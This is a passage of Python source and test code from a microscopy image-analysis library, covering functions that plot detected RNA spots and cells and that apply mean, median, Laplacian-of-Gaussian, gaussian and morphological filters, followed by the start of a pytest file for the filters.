    fill : List[bool] or bool
        List of booleans indicating whether to fill the symbols of the
        detected spots. If `fill` is a boolean, it is applied to every
        element of `spots`.
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
title : str
Title of the image.
framesize : tuple
        Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# check parameters
stack.check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64])
stack.check_parameter(spots=(list, np.ndarray),
shape=(list, str),
radius=(list, int, float),
color=(list, str),
linewidth=(list, int),
fill=(list, bool),
rescale=bool,
contrast=bool,
title=(str, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list),
show=bool)
if isinstance(spots, list):
for spots_ in spots:
stack.check_array(spots_, ndim=2, dtype=[np.int64, np.float64])
else:
stack.check_array(spots, ndim=2, dtype=[np.int64, np.float64])
# enlist and format parameters
if not isinstance(spots, list):
spots = [spots]
n = len(spots)
if not isinstance(shape, list):
shape = [shape] * n
elif isinstance(shape, list) and len(shape) != n:
raise ValueError("If 'shape' is a list, it should have the same "
"number of items than spots ({0}).".format(n))
if not isinstance(radius, list):
radius = [radius] * n
elif isinstance(radius, list) and len(radius) != n:
raise ValueError("If 'radius' is a list, it should have the same "
"number of items than spots ({0}).".format(n))
if not isinstance(color, list):
color = [color] * n
elif isinstance(color, list) and len(color) != n:
raise ValueError("If 'color' is a list, it should have the same "
"number of items than spots ({0}).".format(n))
if not isinstance(linewidth, list):
linewidth = [linewidth] * n
elif isinstance(linewidth, list) and len(linewidth) != n:
raise ValueError("If 'linewidth' is a list, it should have the same "
"number of items than spots ({0}).".format(n))
if not isinstance(fill, list):
fill = [fill] * n
elif isinstance(fill, list) and len(fill) != n:
raise ValueError("If 'fill' is a list, it should have the same "
"number of items than spots ({0}).".format(n))
# plot
fig, ax = plt.subplots(1, 2, sharex='col', figsize=framesize)
# image
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[0].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[0].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[0].imshow(image)
# spots
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[1].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[1].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[1].imshow(image)
for i, coordinates in enumerate(spots):
# get 2-d coordinates
if coordinates.shape[1] == 3:
coordinates_2d = coordinates[:, 1:]
else:
coordinates_2d = coordinates
# plot symbols
for y, x in coordinates_2d:
x = _define_patch(x, y, shape[i], radius[i], color[i],
linewidth[i], fill[i])
ax[1].add_patch(x)
# titles and frames
if title is not None:
ax[0].set_title(title, fontweight="bold", fontsize=10)
ax[1].set_title("Detection results", fontweight="bold", fontsize=10)
if remove_frame:
ax[0].axis("off")
ax[1].axis("off")
plt.tight_layout()
# output
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
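# Hedged usage sketch (not part of the original module): plot two synthetic
# populations of spots with different symbols. Coordinates are int64 arrays
# in (y, x) order, as expected by plot_detection.
def _example_plot_detection():
    rng = np.random.RandomState(0)
    image = rng.randint(0, 255, size=(128, 128)).astype(np.uint16)
    spots = rng.randint(0, 128, size=(20, 2)).astype(np.int64)
    foci = rng.randint(0, 128, size=(5, 2)).astype(np.int64)
    plot_detection(image, [spots, foci],
                   shape=["circle", "square"],
                   radius=[2, 5],
                   color=["red", "blue"])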
def _define_patch(x, y, shape, radius, color, linewidth, fill):
"""Define a matplotlib.patches to plot.
Parameters
----------
x : int or float
Coordinate x for the patch center.
y : int or float
Coordinate y for the patch center.
shape : str
Shape of the patch to define (among `circle`, `square` or `polygon`)
radius : int or float
Radius of the patch.
color : str
Color of the patch.
linewidth : int
Width of the patch border.
fill : bool
        Whether to fill the patch or leave it empty.
Returns
-------
x : matplotlib.patches object
Geometric form to add to a plot.
"""
# circle
if shape == "circle":
x = plt.Circle((x, y), radius,
color=color,
linewidth=linewidth,
fill=fill)
# square
elif shape == "square":
x = plt.Rectangle((x, y), radius, radius,
color=color,
linewidth=linewidth,
fill=fill)
# polygon
elif shape == "polygon":
x = RegularPolygon((x, y), 5, radius,
color=color,
linewidth=linewidth,
fill=fill)
else:
warnings.warn("shape should take a value among 'circle', 'square' or "
"'polygon', but not {0}".format(shape), UserWarning)
return x
def plot_reference_spot(reference_spot, rescale=False, contrast=False,
title=None, framesize=(8, 8), remove_frame=True,
path_output=None, ext="png", show=True):
"""Plot the selected yx plan of the selected dimensions of an image.
Parameters
----------
reference_spot : np.ndarray
Spot image with shape (z, y, x) or (y, x).
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
title : str
Title of the image.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# check parameters
stack.check_array(reference_spot,
ndim=[2, 3],
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64])
stack.check_parameter(rescale=bool,
contrast=bool,
title=(str, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list),
show=bool)
# project spot in 2-d if necessary
if reference_spot.ndim == 3:
reference_spot = stack.maximum_projection(reference_spot)
# plot reference spot
if remove_frame:
fig = plt.figure(figsize=framesize, frameon=False)
ax = fig.add_axes([0, 0, 1, 1])
ax.axis('off')
else:
plt.figure(figsize=framesize)
if not rescale and not contrast:
vmin, vmax = get_minmax_values(reference_spot)
plt.imshow(reference_spot, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
plt.imshow(reference_spot)
else:
if reference_spot.dtype not in [np.int64, bool]:
reference_spot = stack.rescale(reference_spot, channel_to_stretch=0)
plt.imshow(reference_spot)
if title is not None and not remove_frame:
plt.title(title, fontweight="bold", fontsize=25)
if not remove_frame:
plt.tight_layout()
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
# ### Individual cell plot ###
def plot_cell(ndim, cell_coord=None, nuc_coord=None, rna_coord=None,
foci_coord=None, other_coord=None, image=None, cell_mask=None,
nuc_mask=None, title=None, remove_frame=True, rescale=False,
contrast=False, framesize=(15, 10), path_output=None, ext="png",
show=True):
"""
Plot image and coordinates extracted for a specific cell.
Parameters
----------
ndim : int
Number of spatial dimensions to consider in the coordinates (2 or 3).
cell_coord : np.ndarray, np.int64
Coordinates of the cell border with shape (nb_points, 2). If None,
coordinate representation of the cell is not shown.
nuc_coord : np.ndarray, np.int64
Coordinates of the nucleus border with shape (nb_points, 2).
rna_coord : np.ndarray, np.int64
Coordinates of the detected spots with shape (nb_spots, 4) or
(nb_spots, 3). One coordinate per dimension (zyx or yx dimensions)
plus the index of the cluster assigned to the spot. If no cluster was
assigned, value is -1. If only coordinates of spatial dimensions are
        available, only the foci centroids can be shown.
foci_coord : np.ndarray, np.int64
Array with shape (nb_foci, 5) or (nb_foci, 4). One coordinate per
dimension for the foci centroid (zyx or yx dimensions), the number of
spots detected in the foci and its index.
other_coord : np.ndarray, np.int64
Coordinates of the detected elements with shape (nb_elements, 3) or
(nb_elements, 2). One coordinate per dimension (zyx or yx dimensions).
image : np.ndarray, np.uint
Original image of the cell with shape (y, x). If None, original image
of the cell is not shown.
cell_mask : np.ndarray, np.uint
Mask of the cell.
nuc_mask : np.ndarray, np.uint
Mask of the nucleus.
title : str or None
Title of the image.
remove_frame : bool
Remove axes and frame.
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
path_output : str or None
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
if cell_coord is None and image is None:
return
# check parameters
if cell_coord is not None:
stack.check_array(cell_coord, ndim=2, dtype=np.int64)
if nuc_coord is not None:
stack.check_array(nuc_coord, ndim=2, dtype=np.int64)
if rna_coord is not None:
stack.check_array(rna_coord, ndim=2, dtype=np.int64)
if foci_coord is not None:
stack.check_array(foci_coord, ndim=2, dtype=np.int64)
if other_coord is not None:
stack.check_array(other_coord, ndim=2, dtype=np.int64)
if image is not None:
stack.check_array(image, ndim=2,
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64])
if cell_mask is not None:
stack.check_array(cell_mask,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64, bool])
if nuc_mask is not None:
stack.check_array(nuc_mask,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64, bool])
stack.check_parameter(ndim=int,
title=(str, type(None)),
remove_frame=bool,
rescale=bool,
contrast=bool,
framesize=tuple,
path_output=(str, type(None)),
ext=(str, list))
# plot original image and coordinate representation
if cell_coord is not None and image is not None:
fig, ax = plt.subplots(1, 2, figsize=framesize)
# original image
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[0].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[0].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[0].imshow(image)
if cell_mask is not None:
cell_boundaries = stack.from_surface_to_boundaries(cell_mask)
cell_boundaries = np.ma.masked_where(cell_boundaries == 0,
cell_boundaries)
ax[0].imshow(cell_boundaries, cmap=ListedColormap(['red']))
if nuc_mask is not None:
nuc_boundaries = stack.from_surface_to_boundaries(nuc_mask)
nuc_boundaries = np.ma.masked_where(nuc_boundaries == 0,
nuc_boundaries)
ax[0].imshow(nuc_boundaries, cmap=ListedColormap(['blue']))
# coordinate image
ax[1].plot(cell_coord[:, 1], cell_coord[:, 0],
c="black", linewidth=2)
if nuc_coord is not None:
ax[1].plot(nuc_coord[:, 1], nuc_coord[:, 0],
c="steelblue", linewidth=2)
if rna_coord is not None:
ax[1].scatter(rna_coord[:, ndim - 1], rna_coord[:, ndim - 2],
s=25, c="firebrick", marker=".")
if foci_coord is not None:
for foci in foci_coord:
ax[1].text(foci[ndim-1] + 5, foci[ndim-2] - 5, str(foci[ndim]),
color="darkorange", size=20)
            # case where we know which RNAs belong to a focus
if rna_coord.shape[1] == ndim + 1:
foci_indices = foci_coord[:, ndim + 1]
mask_rna_in_foci = np.isin(rna_coord[:, ndim], foci_indices)
rna_in_foci_coord = rna_coord[mask_rna_in_foci, :].copy()
ax[1].scatter(rna_in_foci_coord[:, ndim - 1],
rna_in_foci_coord[:, ndim - 2],
s=25, c="darkorange", marker=".")
# case where we only know the foci centroid
else:
ax[1].scatter(foci_coord[:, ndim - 1], foci_coord[:, ndim - 2],
s=40, c="darkorange", marker="o")
if other_coord is not None:
ax[1].scatter(other_coord[:, ndim - 1], other_coord[:, ndim - 2],
s=25, c="forestgreen", marker="D")
# titles and frames
_, _, min_y, max_y = ax[1].axis()
ax[1].set_ylim(max_y, min_y)
ax[1].use_sticky_edges = True
ax[1].margins(0.01, 0.01)
ax[1].axis('scaled')
if remove_frame:
ax[0].axis("off")
ax[1].axis("off")
if title is not None:
ax[0].set_title("Original image ({0})".format(title),
fontweight="bold", fontsize=10)
ax[1].set_title("Coordinate representation ({0})".format(title),
fontweight="bold", fontsize=10)
plt.tight_layout()
# output
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
# plot coordinate representation only
elif cell_coord is not None and image is None:
if remove_frame:
fig = plt.figure(figsize=framesize, frameon=False)
ax = fig.add_axes([0, 0, 1, 1])
ax.axis('off')
else:
plt.figure(figsize=framesize)
# coordinate image
plt.plot(cell_coord[:, 1], cell_coord[:, 0], c="black", linewidth=2)
if nuc_coord is not None:
plt.plot(nuc_coord[:, 1], nuc_coord[:, 0],
c="steelblue", linewidth=2)
if rna_coord is not None:
plt.scatter(rna_coord[:, ndim - 1], rna_coord[:, ndim - 2],
s=25, c="firebrick", marker=".")
if foci_coord is not None:
for foci in foci_coord:
plt.text(foci[ndim-1] + 5, foci[ndim-2] - 5, str(foci[ndim]),
color="darkorange", size=20)
            # case where we know which RNAs belong to a focus
if rna_coord.shape[1] == ndim + 1:
foci_indices = foci_coord[:, ndim + 1]
mask_rna_in_foci = np.isin(rna_coord[:, ndim], foci_indices)
rna_in_foci_coord = rna_coord[mask_rna_in_foci, :].copy()
plt.scatter(rna_in_foci_coord[:, ndim - 1],
rna_in_foci_coord[:, ndim - 2],
s=25, c="darkorange", marker=".")
# case where we only know the foci centroid
else:
plt.scatter(foci_coord[:, ndim - 1], foci_coord[:, ndim - 2],
s=40, c="darkorange", marker="o")
if other_coord is not None:
plt.scatter(other_coord[:, ndim - 1], other_coord[:, ndim - 2],
s=25, c="forestgreen", marker="D")
# titles and frames
_, _, min_y, max_y = plt.axis()
plt.ylim(max_y, min_y)
plt.use_sticky_edges = True
plt.margins(0.01, 0.01)
plt.axis('scaled')
if title is not None:
plt.title("Coordinate representation ({0})".format(title),
fontweight="bold", fontsize=10)
if not remove_frame:
plt.tight_layout()
# output
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
# plot original image only
elif cell_coord is None and image is not None:
plot_segmentation_boundary(
image=image, cell_label=cell_mask, nuc_label=nuc_mask,
rescale=rescale, contrast=contrast, title=title,
framesize=framesize, remove_frame=remove_frame,
path_output=path_output, ext=ext, show=show)
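# Hedged usage sketch (not part of the original module): coordinate-only
# display of a cell, its nucleus and 3-d RNA spots (ndim=3). All arrays are
# synthetic int64 coordinates built for illustration.
def _example_plot_cell():
    cell_coord = np.array([[0, 0], [0, 99], [99, 99], [99, 0], [0, 0]],
                          dtype=np.int64)
    nuc_coord = np.array([[30, 30], [30, 70], [70, 70], [70, 30], [30, 30]],
                         dtype=np.int64)
    rng = np.random.RandomState(0)
    rna_coord = np.concatenate(
        [rng.randint(0, 10, size=(15, 1)),    # z
         rng.randint(0, 100, size=(15, 2)),   # y, x
         np.full((15, 1), -1)],               # no cluster assigned
        axis=1).astype(np.int64)
    plot_cell(ndim=3, cell_coord=cell_coord, nuc_coord=nuc_coord,
              rna_coord=rna_coord, title="toy cell")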
```
#### File: bigfish/stack/filter.py
```python
import numpy as np
from .utils import check_array
from .utils import check_parameter
from .preprocess import cast_img_float32
from .preprocess import cast_img_float64
from .preprocess import cast_img_uint8
from .preprocess import cast_img_uint16
from skimage.morphology.selem import square
from skimage.morphology.selem import diamond
from skimage.morphology.selem import rectangle
from skimage.morphology.selem import disk
from skimage.morphology import binary_dilation
from skimage.morphology import dilation
from skimage.morphology import binary_erosion
from skimage.morphology import erosion
from skimage.filters import rank
from skimage.filters import gaussian
from scipy.ndimage import gaussian_laplace
from scipy.ndimage import convolve
# ### Filters ###
def _define_kernel(shape, size, dtype):
"""Build a kernel to apply a filter on images.
Parameters
----------
shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`).
size : int, Tuple(int) or List(int)
The size of the kernel:
- For the rectangle we expect two values (`height`, `width`).
- For the square one value (`width`).
- For the disk and the diamond one value (`radius`).
dtype : type
Dtype used for the kernel (the same as the image).
Returns
-------
kernel : skimage.morphology.selem object
Kernel to use with a skimage filter.
"""
# build the kernel
if shape == "diamond":
kernel = diamond(size, dtype=dtype)
elif shape == "disk":
kernel = disk(size, dtype=dtype)
elif shape == "rectangle" and isinstance(size, tuple):
kernel = rectangle(size[0], size[1], dtype=dtype)
elif shape == "square":
kernel = square(size, dtype=dtype)
else:
raise ValueError("Kernel definition is wrong. Shape of the kernel "
"should be 'diamond', 'disk', 'rectangle' or "
"'square'. Not {0}.".format(shape))
return kernel
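# Hedged usage sketch (not part of the original module): _define_kernel
# simply wraps the skimage structuring elements. A 3 x 3 square kernel of
# float64, once normalised, is what mean_filter builds internally.
def _example_define_kernel():
    kernel = _define_kernel(shape="square", size=3, dtype=np.float64)
    # kernel is a (3, 3) array of ones; dividing by its sum turns it into
    # the averaging kernel used by the convolution in mean_filter
    return kernel / kernel.sum()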
def mean_filter(image, kernel_shape, kernel_size):
"""Apply a mean filter to a 2-d through convolution filter.
Parameters
----------
image : np.ndarray, np.uint or np.float
Image with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`).
Returns
-------
image_filtered : np.ndarray, np.uint
Filtered 2-d image with shape (y, x).
"""
# check parameters
check_array(image,
ndim=2,
dtype=[np.float32, np.float64, np.uint8, np.uint16])
check_parameter(kernel_shape=str,
kernel_size=(int, tuple, list))
# build kernel
kernel = _define_kernel(shape=kernel_shape,
size=kernel_size,
dtype=np.float64)
n = kernel.sum()
kernel /= n
# apply convolution filter
image_filtered = convolve(image, kernel)
return image_filtered
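# Hedged usage sketch (not part of the original module): smooth a synthetic
# uint8 image with a disk-shaped averaging kernel of radius 2.
def _example_mean_filter():
    rng = np.random.RandomState(0)
    image = rng.randint(0, 255, size=(32, 32)).astype(np.uint8)
    return mean_filter(image, kernel_shape="disk", kernel_size=2)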
def median_filter(image, kernel_shape, kernel_size):
"""Apply a median filter to a 2-d image.
Parameters
----------
image : np.ndarray, np.uint
Image with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`).
Returns
-------
image_filtered : np.ndarray, np.uint
Filtered 2-d image with shape (y, x).
"""
# check parameters
check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16])
check_parameter(kernel_shape=str,
kernel_size=(int, tuple, list))
# get kernel
kernel = _define_kernel(shape=kernel_shape,
size=kernel_size,
dtype=image.dtype)
# apply filter
image_filtered = rank.median(image, kernel)
return image_filtered
def maximum_filter(image, kernel_shape, kernel_size):
"""Apply a maximum filter to a 2-d image.
Parameters
----------
image : np.ndarray, np.uint
Image with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`).
Returns
-------
image_filtered : np.ndarray, np.uint
Filtered 2-d image with shape (y, x).
"""
# check parameters
check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16])
check_parameter(kernel_shape=str,
kernel_size=(int, tuple, list))
# get kernel
kernel = _define_kernel(shape=kernel_shape,
size=kernel_size,
dtype=image.dtype)
# apply filter
image_filtered = rank.maximum(image, kernel)
return image_filtered
def minimum_filter(image, kernel_shape, kernel_size):
"""Apply a minimum filter to a 2-d image.
Parameters
----------
image : np.ndarray, np.uint
Image with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`).
Returns
-------
image_filtered : np.ndarray, np.uint
Filtered 2-d image with shape (y, x).
"""
# check parameters
check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16])
check_parameter(kernel_shape=str,
kernel_size=(int, tuple, list))
# get kernel
kernel = _define_kernel(shape=kernel_shape,
size=kernel_size,
dtype=image.dtype)
# apply filter
image_filtered = rank.minimum(image, kernel)
return image_filtered
def log_filter(image, sigma):
"""Apply a Laplacian of Gaussian filter to a 2-d or 3-d image.
    The function returns the negative of the filtered image, so that pixels
    with the highest intensity in the original (smoothed) image end up with
    positive values. Pixels that become negative are clipped to zero.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
sigma : float, int, Tuple(float, int) or List(float, int)
Sigma used for the gaussian filter (one for each dimension). If it's a
        scalar, the same sigma is applied to every dimension. Can be computed
with :func:`bigfish.stack.get_sigma`.
Returns
-------
image_filtered : np.ndarray
Filtered image.
"""
# check parameters
check_array(image,
ndim=[2, 3],
dtype=[np.uint8, np.uint16, np.float32, np.float64])
check_parameter(sigma=(float, int, tuple, list))
# we cast the data in np.float to allow negative values
if image.dtype == np.uint8:
image_float = cast_img_float32(image)
elif image.dtype == np.uint16:
image_float = cast_img_float64(image)
else:
image_float = image
# check sigma
if isinstance(sigma, (tuple, list)):
if len(sigma) != image.ndim:
raise ValueError("'sigma' must be a scalar or a sequence with the "
"same length as 'image.ndim'.")
# we apply LoG filter
image_filtered = gaussian_laplace(image_float, sigma=sigma)
# as the LoG filter makes the peaks in the original image appear as a
    # reversed mexican hat, we invert the result and clip negative values to 0
image_filtered = np.clip(-image_filtered, a_min=0, a_max=None)
# cast filtered image
if image.dtype == np.uint8:
image_filtered = cast_img_uint8(image_filtered, catch_warning=True)
elif image.dtype == np.uint16:
image_filtered = cast_img_uint16(image_filtered, catch_warning=True)
else:
pass
return image_filtered
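# Hedged usage sketch (not part of the original module): a LoG filter is
# commonly applied before local-maximum spot detection; bright spots come
# out as positive peaks and the rest of the image is clipped to zero.
def _example_log_filter():
    rng = np.random.RandomState(0)
    image = rng.randint(0, 255, size=(32, 32)).astype(np.uint16)
    return log_filter(image, sigma=1.5)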
def gaussian_filter(image, sigma, allow_negative=False):
"""Apply a Gaussian filter to a 2-d or 3-d image.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
sigma : float, int, Tuple(float, int) or List(float, int)
Sigma used for the gaussian filter (one for each dimension). If it's a
        scalar, the same sigma is applied to every dimension. Can be computed
with :func:`bigfish.stack.get_sigma`.
allow_negative : bool
Allow negative values after the filtering or clip them to 0. Not
compatible with unsigned integer images.
Returns
-------
image_filtered : np.ndarray
Filtered image.
"""
# check parameters
check_array(image,
ndim=[2, 3],
dtype=[np.uint8, np.uint16, np.float32, np.float64])
check_parameter(sigma=(float, int, tuple, list),
allow_negative=bool)
if image.dtype in [np.uint8, np.uint16] and allow_negative:
raise ValueError("Negative values are impossible with unsigned "
"integer image.")
# we cast the data in np.float to allow negative values
if image.dtype == np.uint8:
image_float = cast_img_float32(image)
elif image.dtype == np.uint16:
image_float = cast_img_float64(image)
else:
image_float = image
# we apply gaussian filter
image_filtered = gaussian(image_float, sigma=sigma)
# we clip negative values to 0
if not allow_negative:
image_filtered = np.clip(image_filtered, a_min=0, a_max=1)
# cast filtered image
if image.dtype == np.uint8:
image_filtered = cast_img_uint8(image_filtered, catch_warning=True)
elif image.dtype == np.uint16:
image_filtered = cast_img_uint16(image_filtered, catch_warning=True)
else:
pass
return image_filtered
def remove_background_mean(image, kernel_shape="disk", kernel_size=200):
"""Remove background noise from a 2-d image, subtracting a mean filtering.
Parameters
----------
image : np.ndarray, np.uint
Image to process with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`).
Returns
-------
image_without_back : np.ndarray, np.uint
Image processed.
"""
# compute background noise with a large mean filter
background = mean_filter(image,
kernel_shape=kernel_shape,
kernel_size=kernel_size)
# subtract the background from the original image, clipping negative
# values to 0
mask = image > background
image_without_back = np.subtract(image, background,
out=np.zeros_like(image),
where=mask)
return image_without_back
def remove_background_gaussian(image, sigma):
"""Remove background noise from a 2-d or 3-d image, subtracting a gaussian
filtering.
Parameters
----------
image : np.ndarray
Image to process with shape (z, y, x) or (y, x).
sigma : float, int, Tuple(float, int) or List(float, int)
Sigma used for the gaussian filter (one for each dimension). If it's a
        scalar, the same sigma is applied to every dimension. Can be computed
with :func:`bigfish.stack.get_sigma`.
Returns
-------
image_no_background : np.ndarray
Image processed with shape (z, y, x) or (y, x).
"""
# apply a gaussian filter
image_filtered = gaussian_filter(image, sigma,
allow_negative=False)
# subtract the gaussian filter
out = np.zeros_like(image)
image_no_background = np.subtract(image, image_filtered,
out=out,
where=(image > image_filtered),
dtype=image.dtype)
return image_no_background
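# Hedged usage sketch (not part of the original module): subtract a coarse
# gaussian estimate of the background from a synthetic uint16 image. A sigma
# larger than the structures of interest mostly removes the slowly varying
# background.
def _example_remove_background_gaussian():
    rng = np.random.RandomState(0)
    image = rng.randint(0, 255, size=(64, 64)).astype(np.uint16)
    return remove_background_gaussian(image, sigma=5)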
def dilation_filter(image, kernel_shape=None, kernel_size=None):
"""Apply a dilation to a 2-d image.
Parameters
----------
image : np.ndarray
Image with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`). If None, use cross-shaped structuring
element (``connectivity=1``).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`). If None, use cross-shaped structuring element
(``connectivity=1``).
Returns
-------
image_filtered : np.ndarray
Filtered 2-d image with shape (y, x).
"""
# check parameters
check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.float32, np.float64, bool])
check_parameter(kernel_shape=(str, type(None)),
kernel_size=(int, tuple, list, type(None)))
# get kernel
if kernel_shape is None or kernel_size is None:
kernel = None
else:
kernel = _define_kernel(shape=kernel_shape,
size=kernel_size,
dtype=image.dtype)
# apply filter
if image.dtype == bool:
image_filtered = binary_dilation(image, kernel)
else:
image_filtered = dilation(image, kernel)
return image_filtered
def erosion_filter(image, kernel_shape=None, kernel_size=None):
"""Apply an erosion to a 2-d image.
Parameters
----------
image : np.ndarray
Image with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`). If None, use cross-shaped structuring
element (``connectivity=1``).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`). If None, use cross-shaped structuring element
(``connectivity=1``).
Returns
-------
image_filtered : np.ndarray
Filtered 2-d image with shape (y, x).
"""
# check parameters
check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.float32, np.float64, bool])
check_parameter(kernel_shape=(str, type(None)),
kernel_size=(int, tuple, list, type(None)))
# get kernel
if kernel_shape is None or kernel_size is None:
kernel = None
else:
kernel = _define_kernel(shape=kernel_shape,
size=kernel_size,
dtype=image.dtype)
# apply filter
if image.dtype == bool:
image_filtered = binary_erosion(image, kernel)
else:
image_filtered = erosion(image, kernel)
return image_filtered
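# Hedged usage sketch (not part of the original module): a binary opening
# can be emulated by chaining the two morphological filters above.
def _example_binary_opening():
    rng = np.random.RandomState(0)
    mask = rng.rand(64, 64) > 0.5
    eroded = erosion_filter(mask, kernel_shape="disk", kernel_size=2)
    return dilation_filter(eroded, kernel_shape="disk", kernel_size=2)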
```
#### File: stack/tests/test_filter.py
```python
import pytest
import numpy as np
import bigfish.stack as stack
from bigfish.stack.filter import _define_kernel
from numpy.testing import assert_array_equal
from numpy.testing import assert_allclose
# toy images
x = np.array(
[[3, 2, 0, 0, 0],
[2, 1, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 2, 1, 5, 0],
[0, 0, 0, 0, 0]],
dtype=np.uint8)
y = np.array(
[[0, 0, 62, 164, 55],
[0, 0, 120, 235, 181],
[0, 0, 73, 205, 0],
[0, 131, 0, 0, 0],
[0, 0, 0, 0, 0]],
dtype=np.uint8)
@pytest.mark.parametrize("shape, size", [
("diamond", 3), ("disk", 3), ("rectangle", (2, 3)), ("square", 3),
("blabla", 3)])
@pytest.mark.parametrize("dtype", [
np.uint8, np.uint16, np.uint32, np.uint64,
np.int8, np.int16, np.int32, np.int64,
np.float16, np.float32, np.float64, bool])
def test_kernel(shape, size, dtype):
# non valid case
if shape not in ["diamond", "disk", "rectangle", "square"]:
with pytest.raises(ValueError):
_define_kernel(shape, size, dtype)
# valid cases
else:
kernel = _define_kernel(shape, size, dtype)
if shape == "diamond":
expected_kernel = np.array(
[[0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0]],
dtype=dtype)
elif shape == "disk":
expected_kernel = np.array(
[[0, 0, 0, 1, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 1, 0, 0, 0]],
dtype=dtype)
elif shape == "rectangle":
expected_kernel = np.array(
[[1, 1, 1],
[1, 1, 1]],
dtype=dtype)
else:
expected_kernel = np.array(
[[1, 1, 1],
[1, 1, 1],
[1, 1, 1]],
dtype=dtype)
assert_array_equal(kernel, expected_kernel)
assert kernel.dtype == dtype
def test_mean_filter():
# np.uint8
filtered_x = stack.mean_filter(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[2, 1, 0, 0, 0],
[1, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 0]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.mean_filter(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
# np.float32
filtered_x = stack.mean_filter(x.astype(np.float32),
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[2.333, 1.444, 0.556, 0., 0.],
